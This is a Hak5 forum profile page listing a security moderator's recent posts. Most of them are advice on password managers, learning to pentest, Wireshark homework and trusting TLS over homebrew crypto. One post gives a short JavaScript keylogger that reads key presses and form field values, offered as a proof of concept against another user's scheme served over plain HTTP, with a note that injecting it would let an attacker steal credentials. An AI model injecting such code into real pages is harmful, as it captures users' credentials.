Jump to content
Hak5 Forums

digininja

Global Moderators
  • Content count

    3,374
  • Joined

  • Last visited

  • Days Won

    71

About digininja

  • Rank
    Hacker

Contact Methods

  • Website URL
    https://digi.ninja
  • ICQ
    0

Profile Information

  • Gender
    Male
  • Location
    Sheffield, UK
  • Interests
    Hacking, Coding, Climbing

Recent Profile Visitors

17,580 profile views
  1. digininja

    Password Safe - SecureSafe

    If you are going to use an online one, go with a bigger brand such as Lastpass. I prefer offline Keepass as I have full control over it then.
  2. digininja

    Wireshark

    From the screenshot and what he said it looks like a pcap that he has been given to analyse not a live capture.
  3. digininja

    Wireshark

    If I'd set this as homework (I do teach university classes occasionally) then I'd expect you to write up all the different possibilities. You've mentioned that there are many reasons, write about them all and once you've done that, go through them and speculate on which ones you think could be happening here and which are unlikely. That way, you are showing that you've done the research that you were asked for and showing that you can reason through different options to pick the most appropriate.
  4. digininja

    Wireshark

    Do you understand what the RST flag means and is used for? If not, do some research on that, that might help.
  5. digininja

    Wireshark

    Sounds like you are asking us to do your homework for you.
  6. digininja

    System Pnenetration

    No one will tell you how to penetrate a system because they are all different. What you need to learn is the basics and then put them together in an attack. I can teach you to walk but walking up a mountain is different to walking to the shops or through a wood or with friends. The best advice, and very few people listen to this, is to learn to admin or develop first. If you want to do network testing then learn to admin a network. Properly. Not two boxes at home connected to your router. Build big networks in VMs, put in different OSs, set up roles and services, do big things. If you want to be an app tester, install LAMP stacks, swap out Apache for Nginx, migrate to IIS, write some code, get database connections working. If you don't understand how things work you'll never be able to fully test them as everything you'll be doing will be blind. It is hard work, it isn't glamorous, you won't be able to show off your skills to your mates, but it will pay dividends in the long run. And stay away from CEH, it has no credibility in the industry. Look at things like SecurityTube instead, much better quality.
  7. digininja

    Next Generation Secure Connection through TCP

    And looking at your "fix", all you've done is to add a stop propagation function to an event listener on the document.keyup, this can easily be removed with a line or two of JS.
  8. digininja

    Next Generation Secure Connection through TCP

    As I said, I've proved my point that any code delivered over HTTP can be tampered with meaning it can't be trusted. Put your effort into a problem that needs solving, this one has already been solved with TLS. And before you point at hacked CAs, that is a hacked company, not a weakness in the protocol, big difference.
  9. digininja

    Anonsurf hidden form own network?

    You can do this with any OS. As Parrot OS is Linux based, you'll need to look at iptables https://en.wikipedia.org/wiki/Iptables
  10. digininja

    Next Generation Secure Connection through TCP

    There is a difference between a certificate authority getting breached and TLS being secure. TLS as a protocol is considered by all who know about crypto stuff to be secure enough to be used. The hacks on CAs take a lot of work and are relatively rare. My hack of your system took me a couple of hours therefore I'd say your system is considerably weaker than TLS. If you've deliberately left holes in it then why are you bothering asking people to look for issues? Make it as secure as you can, then get it looked at. Anyway, as I said, I'm done. I've proved with little effort you system can be bypassed regardless of whether you claim the vulnerability was in there deliberately.
  11. digininja

    Next Generation Secure Connection through TCP

    Here is a key logger for you: document.addEventListener("keyup", function(e){ console.log('keylogger: ', e); console.log('keylogger: ', e.key); catchword = document.getElementsByClassName ("form-control"); for (var i = 0; i < catchword.length; i++) { console.log(catchword[i].id + " " + catchword[i].value); } counter = document.getElementsByClassName ("cw"); for (var i = 0; i < counter.length; i++) { console.log(counter[i].id + " " + counter[i].value); } }, true); It is a bit scruffy but inject this into the first JS library you load and it logs all keys that are pressed, you then send them out to a listening third party and you've stolen the creds. I'm going to walk away from this now as even if you add extra protections, the fact the code is coming over in clear text means that I can always inject my own code which will trump yours. This may have been a nice idea to learn about obfuscating code and comms but please, stick with stuff that has been created by people who really know the topics and has been peer reviewed over many years. TLS works.
  12. digininja

    Next Generation Secure Connection through TCP

    it isn't the countersign it is the catchword that it isn't accepting.
  13. digininja

    Next Generation Secure Connection through TCP

    So how do I get it to generate me a new catchword? That email has been and gone now.
  14. digininja

    Next Generation Secure Connection through TCP

    The catchword you gave me has stopped working and the JSON errors are back.
  15. digininja

    Next Generation Secure Connection through TCP

    Unfortunately no feedback tends to mean no one is looking at it. I'm way too busy with work and the few people I've pointed at it can't understand the point so don't want to give it the time. If you really want feedback, put it on the bug bounty sites and offer cash for issues. If you are sure about the stability of it then it won't cost you anything.
×